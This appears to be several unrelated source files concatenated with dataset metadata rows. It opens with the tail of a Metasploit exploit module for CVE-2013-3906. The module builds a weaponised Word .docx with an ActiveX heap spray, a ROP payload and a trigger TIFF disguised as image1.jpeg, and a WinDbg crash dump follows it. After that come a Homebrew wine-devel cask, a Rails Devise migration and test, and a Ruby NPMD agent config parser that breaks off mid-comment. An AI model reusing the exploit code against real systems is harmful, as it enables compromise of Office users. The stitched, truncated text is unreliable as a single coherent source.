      xml.Relationship(Id: "rId#{rid}", Type: bin_rel_type, Target: target_bin)
    end
  end.to_xml(indent: 0)
end
#
# Creates a document.xml.reals file
# @param relationships [Array] A collection of hashes with each containing:
# :id, :type, and :target
# @return [String] XML document
#
def make_doc_xml_reals(relationships)
  # Emits one <Relationship> element per {:id, :type, :target} hash.
  doc = ::Nokogiri::XML('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>')
  ::Nokogiri::XML::Builder.with(doc) do |xml|
    xml.Relationships('xmlns' => 'http://schemas.openxmlformats.org/package/2006/relationships') do
      relationships.each do |rel|
        xml.Relationship(Id: "rId#{rel[:id]}", Type: rel[:type], Target: rel[:target])
      end
    end
  end.to_xml(indent: 0)
end
#
# Creates a _rels/.rels file
#
def init_rels(doc_xml, doc_props)
  # Package-level _rels/.rels: one relationship for document.xml plus one
  # per docProps entry; leading slashes are stripped from targets.
  rels = [doc_xml, doc_props].flatten
  doc = ::Nokogiri::XML('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>')
  builder = ::Nokogiri::XML::Builder.with(doc) do |xml|
    xml.Relationships('xmlns' => 'http://schemas.openxmlformats.org/package/2006/relationships') do
      rels.each do |rel|
        xml.Relationship(Id: "rId#{rel[:id]}", Type: rel[:type], Target: rel[:fname].gsub(/^\//, ''))
      end
    end
  end
  { fname: '_rels/.rels', data: builder.to_xml(indent: 0) }
end
#
# Creates a run element for chart
# @param xml [Element]
# @param rid [String]
#
def create_chart_run_element(xml, rid)
  # Emits a <w:r> run containing a 1x1 EMU inline drawing whose graphicData
  # references chart relationship rId<rid>.
  xml.r do
    xml.rPr do
      xml.noProof
      xml.lang('w:val' => 'en-US')
    end
    xml.drawing do
      xml['wp'].inline('distT' => '0', 'distB' => '0', 'distL' => '0', 'distR' => '0') do
        xml['wp'].extent('cx' => '1', 'cy' => '1')
        xml['wp'].effectExtent('l' => '1', 't' => '0', 'r' => '1', 'b' => '0')
        xml['wp'].docPr('id' => rid.to_s, 'name' => "drawing #{rid}")
        xml['wp'].cNvGraphicFramePr
        xml['a'].graphic do
          xml['a'].graphicData('uri' => 'http://schemas.openxmlformats.org/drawingml/2006/chart') do
            xml['c'].chart('r:id' => "rId#{rid}")
          end
        end
      end
    end
  end
end
#
# Creates a run element for ax
# @param xml [Element]
# @param rid [String]
#
def create_ax_run_element(xml, rid)
  # Emits a <w:r> run embedding one ActiveX control: a tiny VML shape plus
  # the <w:control> element that references relationship rId<rid>.
  shape_id = "_x0000_i10#{rid}"
  xml.r do
    xml.object('w:dxaOrig' => '1440', 'w:dyaOrig' => '1440') do
      xml['v'].shape(
        'id' => shape_id,
        'type' => '#_x0000_t75',
        'style' => 'width:1pt;height:1pt',
        'o:ole' => ''
      )
      xml['w'].control(
        'r:id' => "rId#{rid}",
        'w:name' => "TabStrip#{rid}",
        'w:shapeid' => shape_id
      )
    end
  end
end
#
# Creates a pic run element
# @param xml [Element]
# @param rid [String]
#
# Emits the <w:r> run that embeds the trigger image: an inline DrawingML
# picture whose <a:blip> references image relationship rId<rid>
# (the "image1.jpeg" TIFF built by make_tiff).
def create_pic_run_element(xml, rid)
drawinxml_schema = "http://schemas.openxmlformats.org/drawingml/2006"
xml.r do
xml.rPr do
xml.noProof
xml.lang({'w:val'=>"en-US"})
end
xml.drawing do
xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
# NOTE(review): unlike the sibling elements, extent is emitted without the
# 'wp' prefix here (compare create_chart_run_element) — confirm intended.
xml.extent({'cx'=>'1', 'cy'=>'1'})
xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"})
xml['wp'].docPr({'id'=>rid.to_s, 'name'=>"image", 'descr'=>"image.jpeg"})
xml['wp'].cNvGraphicFramePr do
xml['a'].graphicFrameLocks({'xmlns:a'=>"#{drawinxml_schema}/main", 'noChangeAspect'=>"1"})
end
xml['a'].graphic({'xmlns:a'=>"#{drawinxml_schema}/main"}) do
xml['a'].graphicData({'uri'=>"#{drawinxml_schema}/picture"}) do
xml['pic'].pic({'xmlns:pic'=>"#{drawinxml_schema}/picture"}) do
xml['pic'].nvPicPr do
xml['pic'].cNvPr({'id'=>rid.to_s, 'name'=>"image.jpeg"})
xml['pic'].cNvPicPr
end
xml['pic'].blipFill do
xml['a'].blip('r:embed'=>"rId#{rid.to_s}", 'cstate'=>"print")
xml['a'].stretch do
xml['a'].fillRect
end
end
xml['pic'].spPr do
xml['a'].xfrm do
xml['a'].off({'x'=>"0", 'y'=>"0"})
xml['a'].ext({'cx'=>"1", 'cy'=>"1"})
end
xml['a'].prstGeom({'prst' => "rect"}) do
xml['a'].avLst
end
end
end
end
end
end
end
end
end
#
# Creates a document.xml file
# @param pre_defs [Array]
# @param activex [Array]
# @param tiff_file [Array]
# @return [String] XML document
#
# Builds word/document.xml: one paragraph containing every ActiveX control
# run (the heap spray), then a second paragraph with the chart runs and the
# trigger picture run. Returns the document's rels/content-type descriptor.
def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
# Get all the required pre-defs
chart_rids = []
# NOTE(review): select is used purely for its side effect here (and below);
# the returned array is discarded.
pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//}
# Get all the ActiveX RIDs
ax_rids = []
activex.select { |e| ax_rids << e[:id] }
# Get the TIFF RID
tiff_rid = tiff_file[:id]
# Documentation on how this is crafted:
# http://msdn.microsoft.com/en-us/library/office/gg278308.aspx
doc_attrs = {
'xmlns:ve' => "http://schemas.openxmlformats.org/markup-compatibility/2006",
'xmlns:o' => "urn:schemas-microsoft-com:office:office",
'xmlns:r' => @schema,
'xmlns:m' => "http://schemas.openxmlformats.org/officeDocument/2006/math",
'xmlns:v' => "urn:schemas-microsoft-com:vml",
'xmlns:wp' => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
'xmlns:w10' => "urn:schemas-microsoft-com:office:word",
'xmlns:w' => "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
'xmlns:wne' => "http://schemas.microsoft.com/office/word/2006/wordml",
'xmlns:a' => "http://schemas.openxmlformats.org/drawingml/2006/main",
'xmlns:c' => "http://schemas.openxmlformats.org/drawingml/2006/chart"
}
p_attrs_1 = {'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
p_attrs_2 = {'w:rsidR' => "00D15BD0", 'w:rsidRPr' =>"00D15BD0", 'w:rsidRDefault' => "00D15BD0" }
md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
builder = ::Nokogiri::XML::Builder.with(md) do |xml|
xml.custom_root("w")
xml.document(doc_attrs) do
xml.body do
# Paragraph (ActiveX)
xml.p(p_attrs_1) do
# Paragraph properties
xml.pPr do
# Run properties
xml.rPr do
xml.lang({'w:val' => "en-US"})
end
end
ax_rids.each do |rid|
create_ax_run_element(xml, rid)
end
end
xml.p(p_attrs_2) do
xml.pPr do
xml.rPr do
xml['w'].lang({'w:val'=>"en-US"})
end
end
# Charts
chart_rids.each do |rid|
create_chart_run_element(xml, rid)
end
# TIFF
create_pic_run_element(xml, tiff_rid)
end
end
end
end
# Descriptor consumed by init_rels / init_contenttype_xml_file / make_docx.
{
:id => (last_rid + 1).to_s,
:type => "#{@schema}/officeDocument",
:fname => "/word/document.xml",
:content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
:xml => builder.to_xml(:indent => 0)
}
end
#
# Creates a [Content.Types].xml file located in the parent directory
# @param overrides [Array] A collection of hashes with each containing
# the :PartName and :ContentType info
# @return [String] XML document
#
def make_contenttype_xml(overrides)
  # Default extension-to-MIME mappings every generated package carries.
  default_types = {
    'rels' => 'application/vnd.openxmlformats-package.relationships+xml',
    'xml' => 'application/xml',
    'jpeg' => 'image/jpeg',
    'bin' => 'application/vnd.ms-office.activeX',
    'xlsx' => 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
  }
  doc = ::Nokogiri::XML('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>')
  builder = ::Nokogiri::XML::Builder.with(doc) do |xml|
    xml.Types('xmlns' => 'http://schemas.openxmlformats.org/package/2006/content-types') do
      default_types.each do |extension, content_type|
        xml.Default(Extension: extension, ContentType: content_type)
      end
      # Per-part overrides supplied by the caller; :PartName falls back to
      # the part's :fname when not given explicitly.
      overrides.each do |override|
        xml.Override(
          PartName: override[:PartName] || override[:fname],
          ContentType: override[:ContentType]
        )
      end
    end
  end
  builder.to_xml(indent: 0)
end
#
# Pre-define some items that will be used in .rels
#
def init_doc_props(last_rid)
  # Descriptors for docProps/app.xml and docProps/core.xml, consuming two
  # fresh relationship IDs (evaluated left-to-right in the literal).
  items = [
    {
      :id => (last_rid += 1),
      :type => "#{@schema}/extended-properties",
      :fname => '/docProps/app.xml',
      :content_type => 'application/vnd.openxmlformats-officedocument.extended-properties+xml'
    },
    {
      :id => (last_rid += 1),
      :type => 'http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties',
      :fname => '/docProps/core.xml',
      :content_type => 'application/vnd.openxmlformats-package.core-properties+xml'
    }
  ]
  return last_rid, items
end
#
# Pre-define some items that will be used in document.xml.rels
#
def init_doc_xml_rels_items(last_rid)
  items = []
  # Appends one descriptor, consuming the next relationship ID; the
  # relationship type is always "#{@schema}/<rel>".
  add = lambda do |rel, fname, ctype|
    items << {
      :id => (last_rid += 1),
      :type => "#{@schema}/#{rel}",
      :fname => fname,
      :content_type => ctype
    }
  end
  wordml = 'application/vnd.openxmlformats-officedocument.wordprocessingml'
  add.call('styles', '/word/styles.xml', "#{wordml}.styles+xml")
  add.call('settings', '/word/settings.xml', "#{wordml}.settings+xml")
  add.call('webSettings', '/word/webSettings.xml', "#{wordml}.webSettings+xml")
  add.call('fontTable', '/word/fontTable.xml', "#{wordml}.fontTable+xml")
  add.call('theme', '/word/theme/theme1.xml',
           'application/vnd.openxmlformats-officedocument.theme+xml')
  # Six chart parts, chart1.xml through chart6.xml.
  6.times do |i|
    add.call('chart', "/word/charts/chart#{i + 1}.xml",
             'application/vnd.openxmlformats-officedocument.drawingml.chart+xml')
  end
  return last_rid, items
end
#
# Manually create everything manually in the ActiveX directory
#
def init_activex_files(last_rid)
  # 0x250 controls are generated; each entry bundles the .bin payload, its
  # activeX<N>.xml stanza, and the matching .rels file.
  controls = Array.new(0x250) do
    id = (last_rid += 1)
    {
      :id => id,
      :bin => {
        :fname => "/word/activeX/activeX#{id}.bin",
        :bin => make_activex_bin
      },
      :xml => {
        :fname => "/word/activeX/activeX#{id}.xml",
        :xml => make_activex_xml(id)
      },
      :rels => {
        :fname => "/word/activeX/_rels/activeX#{id}.xml.rels",
        :rels => make_activex_xml_reals(id, "activeX#{id}.bin")
      },
      :content_type => 'application/vnd.ms-office.activeX+xml',
      :type => "#{@schema}/control"
    }
  end
  return last_rid, controls
end
#
# Create a [Content_Types.xml], each node contains these attributes:
# :PartName The path to an ActiveX XML file
# :ContentType The contenttype of the XML file
#
def init_contenttype_xml_file(*items)
  # Flattens all descriptor collections into override entries; ActiveX
  # descriptors expose their part name under [:xml][:fname].
  overrides = items.flatten.map do |obj|
    {
      :PartName => obj[:fname] || obj[:xml][:fname],
      :ContentType => obj[:content_type]
    }
  end
  { :fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides) }
end
#
# Creates the tiff file
#
def init_tiff_file(last_rid)
  # Descriptor for the trigger image part (a TIFF named as .jpeg inside the
  # package), consuming one fresh relationship ID.
  rid = last_rid + 1
  descriptor = {
    :id => rid,
    :fname => '/word/media/image1.jpeg',
    :data => make_tiff,
    :type => "#{@schema}/image"
  }
  return rid, descriptor
end
#
# Create the document.xml.rels file
#
def init_doc_xml_reals_file(pre_defs, activex, tiff)
  # Targets inside document.xml.rels are relative to /word/, so the prefix
  # is stripped from every part name.
  strip_word = ->(path) { path.gsub(%r{^/word/}, '') }
  rels = pre_defs.map do |obj|
    { :id => obj[:id], :type => obj[:type], :target => strip_word.call(obj[:fname]) }
  end
  rels += activex.map do |obj|
    { :id => obj[:id], :type => obj[:type], :target => strip_word.call(obj[:xml][:fname]) }
  end
  rels << { :id => tiff[:id], :type => tiff[:type], :target => strip_word.call(tiff[:fname]) }
  { :fname => '/word/_rels/document.xml.rels', :data => make_doc_xml_reals(rels) }
end
#
# Loads a file
#
#
# Reads a file in binary mode and returns its raw bytes. Uses File.binread
# instead of the manual open("rb")/read/append dance — same result, no
# intermediate buffer.
#
# @param fname [String] path of the file to read
# @return [String] the file's contents
#
def read_file(fname)
  ::File.binread(fname)
end
#
# Packages everything to docx
#
# Assembles the final .docx: generates every dynamic part (rels, ActiveX
# spray, charts metadata, trigger TIFF, document.xml), copies the static
# template tree from +path+, and returns the packed zip bytes.
def make_docx(path)
print_status("Initializing files...")
# Relationship IDs are allocated sequentially across all part generators.
last_rid = 0
last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
last_rid, activex = init_activex_files(last_rid)
last_rid, doc_props = init_doc_props(last_rid)
last_rid, tiff_file = init_tiff_file(last_rid)
doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
ct_xml_file = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml])
doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
rels_xml = init_rels(doc_xml, doc_props)
zip = Rex::Zip::Archive.new
# Copy the static template tree verbatim into the archive.
# NOTE(review): the local `p` shadows Kernel#p inside this loop.
Dir["#{path}/**/**"].each do |file|
p = file.sub(path+'/','')
if File.directory?(file)
print_status("Packing directory: #{p}")
zip.add_file(p)
else
# Avoid packing image1.jpeg because we'll load it separately
if file !~ /media\/image1\.jpeg/
print_status("Packing file: #{p}")
zip.add_file(p, read_file(file))
end
end
end
print_status("Packing ActiveX controls...")
activex.each do |ax|
ax_bin = ax[:bin]
ax_xml = ax[:xml]
ax_rels = ax[:rels]
vprint_status("Packing file: #{ax_bin[:fname]}")
zip.add_file(ax_bin[:fname], ax_bin[:bin])
vprint_status("Packing file: #{ax_xml[:fname]}")
zip.add_file(ax_xml[:fname], ax_xml[:xml])
vprint_status("Packing file: #{ax_rels[:fname]}")
zip.add_file(ax_rels[:fname], ax_rels[:rels])
end
# Dynamic top-level parts generated above.
print_status("Packing file: #{ct_xml_file[:fname]}")
zip.add_file(ct_xml_file[:fname], ct_xml_file[:data])
print_status("Packing file: #{tiff_file[:fname]}")
zip.add_file(tiff_file[:fname], tiff_file[:data])
print_status("Packing file: #{doc_xml[:fname]}")
zip.add_file(doc_xml[:fname], doc_xml[:xml])
print_status("Packing file: #{rels_xml[:fname]}")
zip.add_file(rels_xml[:fname], rels_xml[:data])
print_status("Packing file: #{doc_xml_reals_file[:fname]}")
zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data])
zip.pack
end
# Entry point: builds the ROP/payload spray, records the OOXML relationship
# schema used by all of the package builders, assembles the docx from the
# shipped template directory, and writes it out via FILEFORMAT.
def exploit
  @rop_payload = get_rop_payload
  @schema = 'http://schemas.openxmlformats.org/officeDocument/2006/relationships'
  template_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-3906')
  file_create(make_docx(template_dir))
end
end
=begin
0:000> r
eax=414242f4 ebx=00000000 ecx=22a962a0 edx=44191398 esi=22c4d338 edi=1cfe5dc0
eip=44023a2a esp=0011fd8c ebp=0011fd98 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
OGL!GdipCreatePath+0x58:
44023a2a ff5050 call dword ptr [eax+50h] ds:0023:41424344=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0011fd98 437a9681 OGL!GdipCreatePath+0x58
0011fdc8 437b11b0 gfx+0x9681
0011fdf0 422b56e5 gfx+0x111b0
0011fe18 422a99f7 oart!Ordinal3584+0x86
0011fed8 422a9921 oart!Ordinal7649+0x2b2
0011fef0 422a8676 oart!Ordinal7649+0x1dc
001200bc 422a85a8 oart!Ordinal4145+0x199
001200fc 424898c6 oart!Ordinal4145+0xcb
001201bc 42489b56 oart!Ordinal3146+0xb15
001202cc 422a37df oart!Ordinal3146+0xda5
00120330 422a2a73 oart!Ordinal2862+0x14e
00120360 317821a9 oart!Ordinal2458+0x5e
001203bc 31782110 wwlib!GetAllocCounters+0x9bd51
001204a4 3177d1f2 wwlib!GetAllocCounters+0x9bcb8
001207ec 3177caef wwlib!GetAllocCounters+0x96d9a
0012088c 3177c7a0 wwlib!GetAllocCounters+0x96697
001209b0 3175ab83 wwlib!GetAllocCounters+0x96348
001209d4 317569e0 wwlib!GetAllocCounters+0x7472b
00120ad4 317540f5 wwlib!GetAllocCounters+0x70588
00120afc 3175400b wwlib!GetAllocCounters+0x6dc9d
To-do:
Turn the docx packaging into a mixin. Good luck with that.
=end
| 33.410929 | 149 | 0.572111 |
6296723c0d8668292cda41f2e99400e9a1e33ca0 | 2,541 | cask 'wine-devel' do
version '5.6'
sha256 'ef09426f20a47dce654729dd1f737823776883ab61e897b8fe53c3eb5fe8680a'
url "https://dl.winehq.org/wine-builds/macosx/pool/winehq-devel-#{version}.pkg"
appcast 'https://dl.winehq.org/wine-builds/macosx/download.html'
name 'WineHQ-devel'
homepage 'https://wiki.winehq.org/MacOS'
conflicts_with formula: 'wine',
cask: [
'wine-stable',
'wine-staging',
]
depends_on x11: true
pkg "winehq-devel-#{version}.pkg",
choices: [
{
'choiceIdentifier' => 'choice3',
'choiceAttribute' => 'selected',
'attributeSetting' => 1,
},
]
binary "#{appdir}/Wine Devel.app/Contents/Resources/start/bin/appdb"
binary "#{appdir}/Wine Devel.app/Contents/Resources/start/bin/winehelp"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/msiexec"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/notepad"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/regedit"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/regsvr32"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wine"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wine64"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wineboot"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winecfg"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wineconsole"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winedbg"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winefile"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winemine"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/winepath"
binary "#{appdir}/Wine Devel.app/Contents/Resources/wine/bin/wineserver"
uninstall pkgutil: [
'org.winehq.wine-devel',
'org.winehq.wine-devel-deps',
'org.winehq.wine-devel-deps64',
'org.winehq.wine-devel32',
'org.winehq.wine-devel64',
],
delete: '/Applications/Wine Devel.app'
caveats <<~EOS
#{token} installs support for running 64 bit applications in Wine, which is considered experimental.
If you do not want 64 bit support, you should download and install the #{token} package manually.
EOS
end
| 45.375 | 104 | 0.639512 |
e2eb33eabebf1c02ab994fc6ebd65832ba52ca42 | 320 | class DeviseCreateUsers < ActiveRecord::Migration
# Creates the devise-backed users table and enforces email uniqueness
# with a unique index.
def change
  create_table(:users) do |t|
    t.string :email, null: false
    # Optional profile columns — all plain strings.
    %i[name first_name last_name profile_image_url].each { |col| t.string col }
    t.timestamps
  end
  add_index :users, :email, unique: true
end
end
| 20 | 49 | 0.65625 |
6a72ffaffa1521d4cd6539701cacf74d327eef74 | 1,457 | require "test_helper"
# Integration tests for the user profile edit flow, including the
# friendly-forwarding behavior after login.
class UsersEditTest < ActionDispatch::IntegrationTest
  def setup
    @user = users(:kevin)
  end

  test "unsuccessful edit" do
    log_in_as(@user)
    get edit_user_path(@user)
    assert_template 'users/edit'
    invalid_attrs = { name: "", email: "foo@invalid", password: "foo", password_confirmation: "bar" }
    patch user_path(@user), params: { user: invalid_attrs }
    assert_template 'users/edit'
    assert_select "div.alert", text: "The form contains 4 errors."
  end

  test "successful edit" do
    log_in_as(@user)
    get edit_user_path(@user)
    assert_template 'users/edit'
    submit_valid_edit(name: "Foo Bar", email: "[email protected]")
  end

  test "successful edit with friendly forwarding" do
    get edit_user_path(@user)
    assert_not_nil session[:forwarding_url]
    log_in_as(@user)
    assert_redirected_to edit_user_path(@user)
    submit_valid_edit(name: "Foo Bar", email: "[email protected]")
  end

  private

  # Submits a valid profile update (blank password means "unchanged") and
  # verifies the flash, the redirect, and the persisted attributes.
  def submit_valid_edit(name:, email:)
    patch user_path(@user), params: { user:
      { name: name, email: email, password: "", password_confirmation: "" }
    }
    assert_not flash.empty?
    assert_redirected_to @user
    @user.reload
    assert_equal name, @user.name
    assert_equal email, @user.email
  end
end
| 26.490909 | 87 | 0.664379 |
1128cbca90ea63cfe09f755af5db56f5c751d6de | 52,754 | class Logger
require 'thread'
# Extra caller-stack depth to skip when the logging call site is inside a
# rescue block (see getMethodname).
LOG_DEPTH_INC_RESC = 1 # Depth increase of method scope for rescue
# Extra caller-stack depth to skip when the logging call site is inside a
# loop/block.
LOG_DEPTH_INC_LOOP = 2 # Depth increase of method scope for loop
# Logs +msg+ at ERROR level on the global $log, tagged with "[NPMD]" and
# the resolved name of the calling method.
# depth:: extra stack frames to skip when resolving the caller's name.
def self.log_error(msg, depth=0)
  caller_label = getMethodname(depth)
  $log.error "[NPMD]:[#{caller_label}]:#{msg}"
end
# Logs +msg+ at INFO level on the global $log, tagged with "[NPMD]" and
# the resolved name of the calling method.
def self.log_info(msg, depth=0)
  $log.info "[NPMD]:[#{getMethodname(depth)}]:#{msg}"
end
# Logs +msg+ at WARN level on the global $log, tagged with "[NPMD]" and
# the resolved name of the calling method.
def self.log_warn(msg, depth=0)
  $log.warn "[NPMD]:[#{getMethodname(depth)}]:#{msg}"
end
# camelCase aliases kept for backward compatibility with older call sites.
class << self
  alias_method :logError, :log_error
  alias_method :logInfo, :log_info
  alias_method :logWarn, :log_warn
end
private

# Resolves the label (method name) of the logging call site.
#
# depth:: extra stack frames to skip on top of the two internal frames
#         (this method plus the log_* wrapper). Negative values are
#         treated as 0.
#
# Returns the frame label, or "unknown" when the stack is shallower than
# requested. (The original indexed [0] on a possibly-nil result of
# caller_locations, raising NoMethodError — including from inside its own
# rescue fallback.)
# NOTE: the bare +private+ above does not apply to +def self.+ methods,
# so this remains publicly callable; that matches historical behavior.
def self.getMethodname(depth)
  _depth = depth > 0 ? depth : 0
  begin
    frames = caller_locations(2 + _depth, 1)
    frames && frames[0] ? frames[0].label : "unknown"
  rescue
    frames = caller_locations(2 + LOG_DEPTH_INC_RESC, 1)
    frames && frames[0] ? frames[0].label : "unknown"
  end
end
# Convenience accessor for the loop depth increment (used at call sites
# as Logger::loop). Shadows Kernel#loop on this class — intentional here.
def self.loop
  LOG_DEPTH_INC_LOOP
end
# Convenience accessor for the rescue depth increment (Logger::resc).
def self.resc
  LOG_DEPTH_INC_RESC
end
end
# Module to parse config received from DSC and generate Agent Configuration
module NPMDConfig
require 'rexml/document'
require 'json'
require 'ipaddr'
require 'socket'
# Need to have method to get the subnetmask
# Reopens stdlib IPAddr to expose the netmask as a dotted address string
# (e.g. "255.255.255.0"), used when emitting agent IP configurations.
class ::IPAddr
  # NOTE(review): relies on IPAddr's private internals (_to_string and
  # @mask_addr); confirm these still exist in the stdlib version shipped
  # with the target Ruby.
  def getNetMaskString
    _to_string(@mask_addr)
  end
end
# This class holds the methods for creating
# a config understood by NPMD Agent from a hash
# Builds the NPMD agent JSON configuration from the hash produced by
# UIConfigParser. Entries that cannot be resolved (e.g. unknown subnet
# names) are dropped and tallied in class-level counters so a summary
# string can be reported via getErrorSummary.
class AgentConfigCreator
  public
  # Variables for tracking errors
  @@agent_ip_drops = 0
  @@agent_drops = 0
  @@network_subnet_drops = 0
  @@network_drops = 0
  @@rule_subnetpair_drops = 0
  @@rule_drops = 0
  # Strings utilized in drop summary
  DROP_IPS = "Agent IPs"
  DROP_AGENTS = "Agents"
  DROP_SUBNETS = "Network subnets"
  DROP_NETWORKS = "Networks"
  DROP_SUBNETPAIRS= "Rule subnetpairs"
  DROP_RULES = "Rules"

  # Reset error checking
  # Zeroes all drop counters; call before each conversion run.
  def self.resetErrorCheck
    @@agent_ip_drops = 0
    @@agent_drops = 0
    @@network_subnet_drops = 0
    @@network_drops = 0
    @@rule_subnetpair_drops = 0
    @@rule_drops = 0
  end

  # Generating the error string
  # Returns a space-joined "<Category>=<count>" summary; categories with
  # zero drops contribute an empty string (so the result may contain
  # extra spaces).
  def self.getErrorSummary
    _agentIpDrops=""
    _agentDrops=""
    _networkSNDrops=""
    _networkDrops=""
    _ruleSNPairDrops=""
    _ruleDrops=""
    if @@agent_ip_drops != 0
      _agentIpDrops = "#{DROP_IPS}=#{@@agent_ip_drops}"
    end
    if @@agent_drops != 0
      _agentDrops= "#{DROP_AGENTS}=#{@@agent_drops}"
    end
    if @@network_subnet_drops != 0
      _networkSNDrops = "#{DROP_SUBNETS}=#{@@network_subnet_drops}"
    end
    if @@network_drops != 0
      _networkDrops = "#{DROP_NETWORKS}=#{@@network_drops}"
    end
    if @@rule_subnetpair_drops != 0
      _ruleSNPairDrops = "#{DROP_SUBNETPAIRS}=#{@@rule_subnetpair_drops}"
    end
    if @@rule_drops != 0
      _ruleDrops = "#{DROP_RULES}=#{@@rule_drops}"
    end
    _str = _agentIpDrops + " " + _agentDrops + " " +
           _networkSNDrops + " " + _networkDrops + " " +
           _ruleSNPairDrops + " " + _ruleDrops
  end

  # Only accessible method
  # Converts the parsed UI hash into the agent's JSON configuration
  # string. Returns nil when configHash is nil; raises on any other
  # error after logging it.
  def self.createJsonFromUIConfigHash(configHash)
    begin
      if configHash == nil
        Logger::logError "Config received is NIL"
        return nil
      end
      _subnetInfo = getProcessedSubnetHash(configHash["Subnets"])
      _doc = {"Configuration" => {}}
      _doc["Configuration"] ["Metadata"] = createMetadataElements(configHash["Metadata"])
      _doc["Configuration"] ["Agents"] = createAgentElements(configHash["Agents"], _subnetInfo["Masks"])
      _doc["Configuration"] ["Networks"] = createNetworkElements(configHash["Networks"], _subnetInfo["IDs"])
      _doc["Configuration"] ["Rules"] = createRuleElements(configHash["Rules"], _subnetInfo["IDs"]) unless !configHash.has_key?("Rules")
      _doc["Configuration"] ["EPM"] = createEpmElements(configHash["Epm"]) unless !configHash.has_key?("Epm")
      _doc["Configuration"] ["ER"] = createERElements(configHash["ER"]) unless !configHash.has_key?("ER")
      _configJson = _doc.to_json
      _configJson
    rescue StandardError => e
      Logger::logError "Got error creating JSON from UI Hash: #{e}", Logger::resc
      raise "Got error creating AgentJson: #{e}"
    end
  end

  private

  # Returns the dotted netmask string for an IPAddr (via the
  # getNetMaskString monkey patch above).
  def self.getNetMask(ipaddrObj)
    _tempIp = IPAddr.new(ipaddrObj.getNetMaskString)
    _tempIp.to_s
  end

  # Builds {"Masks" => {subnetName => netmask}, "IDs" => {subnetName => cidr}}
  # from the raw subnet hash. Returns nil (and logs) on malformed input.
  def self.getProcessedSubnetHash(subnetHash)
    _h = Hash.new
    _h["Masks"] = Hash.new
    _h["IDs"] = Hash.new
    begin
      subnetHash.each do |key, value|
        _tempIp = IPAddr.new(value)
        _h["Masks"][key] = getNetMask(_tempIp)
        _h["IDs"][key] = value
      end
      _h
    rescue StandardError => e
      Logger::logError "Got error while creating subnet hash: #{e}", Logger::resc
      nil
    end
  end

  # Copies the metadata fields the agent understands; missing string
  # fields default to "". Note the mixed string/symbol keys below are
  # intentional-looking but inconsistent — preserved as-is.
  def self.createMetadataElements(metadataHash)
    _metadata = Hash.new
    _metadata["Version"] = metadataHash.has_key?("Version") ? metadataHash["Version"] : String.new
    _metadata["Protocol"] = metadataHash.has_key?("Protocol") ? metadataHash["Protocol"] : String.new
    _metadata["SubnetUid"] = metadataHash.has_key?("SubnetUid") ? metadataHash["SubnetUid"] : String.new
    _metadata["AgentUid"] = metadataHash.has_key?("AgentUid") ? metadataHash["AgentUid"] : String.new
    _metadata[:"WorkspaceResourceId"] = metadataHash["WorkspaceResourceID"] if metadataHash.has_key?("WorkspaceResourceID")
    _metadata[:"WorkspaceId"] = metadataHash["WorkspaceID"] if metadataHash.has_key?("WorkspaceID")
    _metadata[:"LastUpdated"] = metadataHash["LastUpdated"] if metadataHash.has_key?("LastUpdated")
    return _metadata
  end

  # Maps parsed agents to agent elements, resolving each IP's subnet
  # name to a netmask via maskHash; unresolvable subnets increment
  # @@agent_ip_drops and the IP is emitted without a "Mask".
  def self.createAgentElements(agentArray, maskHash)
    _agents = Array.new
    agentArray.each do |x|
      _agent = Hash.new
      _agent["Name"] = x["Guid"];
      _agent["Capabilities"] = x["Capability"].to_s;
      _agent["IPConfiguration"] = [];
      x["IPs"].each do |ip|
        _ipConfig = Hash.new
        _ipConfig["IP"] = ip["IP"];
        _subnetMask = maskHash[ip["SubnetName"]];
        if _subnetMask.nil?
          Logger::logWarn "Did not find subnet mask for subnet name #{ip["SubnetName"]} in hash", 2*Logger::loop
          @@agent_ip_drops += 1
        else
          _ipConfig["Mask"] = maskHash[ip["SubnetName"]];
        end
        _agent["IPConfiguration"].push(_ipConfig);
      end
      _agents.push(_agent);
      # NOTE(review): this check sits inside the loop immediately after a
      # push, so _agents can never be empty here and @@agent_drops is
      # never incremented — confirm the intended placement.
      if _agents.empty?
        @@agent_drops += 1
      end
    end
    _agents
  end

  # Maps parsed networks to network elements, resolving subnet names to
